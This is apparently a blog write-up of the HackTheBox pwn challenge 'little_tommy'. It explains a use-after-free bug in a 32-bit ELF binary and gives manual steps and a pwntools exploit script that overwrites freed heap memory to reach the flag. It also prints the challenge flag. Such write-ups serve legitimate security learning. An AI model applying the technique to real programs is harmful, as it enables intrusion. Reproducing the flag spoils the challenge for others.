Posted onEdited onInpwn
,
逆向Views: Word count in article: 785Reading time ≈3 mins.
详细过程及exp
1. Basic checks:
1 2 3 4 5 6 7 8 9 10 11
┌──(root💀kali)-[~/hackthebox/challenge/pwn/little_tommy] └─# file little_tommy little_tommy: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=861838865726f48aa954b8df920d1be3ae683b40, not stripped ┌──(root💀kali)-[~/hackthebox/challenge/pwn/little_tommy] └─# checksec little_tommy [*] '/root/hackthebox/challenge/pwn/little_tommy/little_tommy' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)
2. General overview:
There are 5 options to chose from.
The first function “Create account” (1) allocates 72B of space on the heap with malloc().
The maximum length of (2) “First name” could be 32B as well as the maximum length of (3) “Last name”.
The second option “Display account” prints 0–31B stored on the heap of “First name”, 32–64B of “Last name” and 65 — 72B of “Account balance”.
The third function deletes the account by calling free() on the space pointed by *main_account.
The fourth option “Add memo” copies user input to the heap.
Last option prints the flag if there is an account created and 64 — 72 bytes of the space of the account variable (which are stored on the heap) are set to 0x6b637566 which means in ASCII “fuck”.
3. Spot the vulnerability:
There is a Use-After-Free — vulnerability related to incorrect use of dynamic memory during program operation.
If you first create an account the pointer used for dynamic memory allocation will point at the end of the chunk (1).
If you delete it, then the pointer, instead of being set to null continues to refer to the now-freed memory, the result is a dangling pointer (2).
If the program then allocates this same chunk of memory to *memo (3) the dangling pointer will now reference this new data set.
So at the end *main_account + 0x40 will be overflowed by 64–72B added by “Add memo” functionality (4).
4. Exploit the Use-After-Free vulnerability locally:
First — create an account with random data (could be blank).
1 2 3 4 5 6
Please enter an operation number: 1
First name: aaaa Last name: aaaa
Thank you, your account number 155584960.
Then delete this account - to set the dangling pointer at the beginning.
1 2 3
Please enter an operation number: 3
Account deleted successfully
Add memo - to overwrite the dynamic memory space referenced by *main_account with custom bytes, thus overwriting 0x40B with “fuck”
1 2 3 4 5 6
Please enter an operation number: 4
Please enter memo: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaafuck
Thank you, please keep this reference number number safe: 155584960.
Use the 5th option to read the flag since both conditions are True.
1 2
Please enter an operation number: 5 /bin/cat: flag: 没有那个文件或目录
p.recvline("Please enter an operation number:") sleep(1) p.sendline("1") sleep(1) p.recvline("First name:") p.sendline("luci") sleep(1) p.recvline("Last name:") p.sendline("luci") sleep(1) p.recvline("Please enter an operation number:") p.sendline("3") p.recvline("Account deleted successfully") sleep(1) p.recvline("Please enter an operation number:") p.sendline("4") sleep(1) p.recvline("Please enter memo:") p.sendline("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAfuck") p.recvline("Thank you, please keep this reference number number safe:") sleep(1) p.recvline("Please enter an operation number:") p.sendline("5")
p.interactive()
1 2 3 4 5 6 7 8 9 10 11 12 13
Please enter an operation number: [DEBUG] Received 0x3 bytes: '5\r\n'
[DEBUG] Received 0x9e bytes: 'HTB{I_am_so_heaped_up_right_now}\r\n' '\r\n' '1. Create account\r\n' '2. Display account\r\n' '3. Delete account\r\n' '4. Add memo\r\n' '5. Print flag\r\n' '\r\n' 'Please enter an operation number: '